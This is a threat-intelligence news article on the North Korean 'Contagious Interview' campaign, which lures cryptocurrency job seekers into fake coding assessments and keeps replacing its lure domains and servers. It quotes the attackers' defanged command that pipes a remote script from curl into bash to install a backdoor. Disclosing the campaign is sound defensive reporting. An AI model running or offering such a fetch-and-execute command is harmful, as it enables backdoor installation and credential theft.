North Korean Threat Actors Reveal Their Tactics in Replacing Infrastructure With New Assets

Cybersecurity

In the past year, there has been a notable increase in activity by North Korean threat actors targeting professionals within the cryptocurrency sector. Utilizing advanced social engineering techniques, these actors have launched a campaign termed Contagious Interview.

Campaign Overview

The campaign employs a deceptive job application process to deliver malware. Victims are invited to participate in assessments for positions at nonexistent firms, leading them to execute malicious scripts unknowingly.

To maintain operations, the attackers rapidly replace compromised domains and servers, ensuring sustained engagement and evasion of takedown efforts.

Infrastructure Replacement

Since early 2025, domains such as skillquestions[.]com and talentcheck[.]pro have been registered to create lure websites. These sites prompt candidates to execute shell commands, escalating to full system compromise by downloading malware that exfiltrates credentials.

These operations leverage continuous monitoring of threat intelligence platforms to remain informed of their own infrastructure exposure, favoring new server deployments over modifying existing assets.

Infection Mechanism

The infection process is initiated when targets visit a lure site and encounter a JavaScript-powered form simulating a coding assessment. Upon triggering a fabricated error, a terminal command is displayed:

curl - s https[:]//api[.]drive-release[.]cloud/update[.]sh | bash

Executing this command downloads a shell script that installs a backdoor, ensures persistence, and communicates with a command-and-control server to register the compromised host. Detailed victimology records are logged by the ContagiousDrop Node[.]js application.

Impact and Response

These tactics highlight the advanced capabilities of North Korean threat actors, posing a persistent threat. To counteract these efforts, understanding the infection mechanism is crucial for disrupting the attack chain. Enhanced detection protocols are necessary to protect targeted industries from these evolving threats.